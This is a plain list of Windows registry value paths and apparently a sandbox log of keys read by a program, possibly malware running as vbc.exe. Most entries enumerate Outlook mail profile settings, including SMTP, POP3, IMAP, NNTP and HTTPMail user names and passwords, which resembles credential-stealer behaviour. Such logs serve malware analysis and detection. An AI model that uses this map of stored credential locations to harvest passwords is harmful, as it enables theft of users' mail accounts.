HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E2B51919-207A-43EB-AE78-733F9C6797C2}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E2B51919-207A-43EB-AE78-733F9C6797C2}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2608539\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2689322\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2723430\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2821701\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2845370\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2890375\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f65db027-aff3-4070-886a-0d87064aabb1}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f65db027-aff3-4070-886a-0d87064aabb1}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}\DisplayName
HKEY_CURRENT_USER\Software\WinRAR\HWID
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Signature
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheOptions
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\vbc.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagMatchAnyMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\Windows Mail\Salt
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Account Manager\Outlook
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Account Manager\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Email Address
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP Email Address
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTP Server URL
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTPMail User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTPMail Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTPMail Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\NNTP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\HTTP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\POP3 Port
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\SMTP Port
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\IMAP Port
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Email Address
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Email Address
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTP Server URL
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTPMail User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTPMail Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTPMail Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\NNTP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\HTTP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\POP3 Port
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Port
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\IMAP Port
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Email Address
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP Email Address
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTP Server URL
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTPMail User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTPMail Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTPMail Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\NNTP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\HTTP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Password
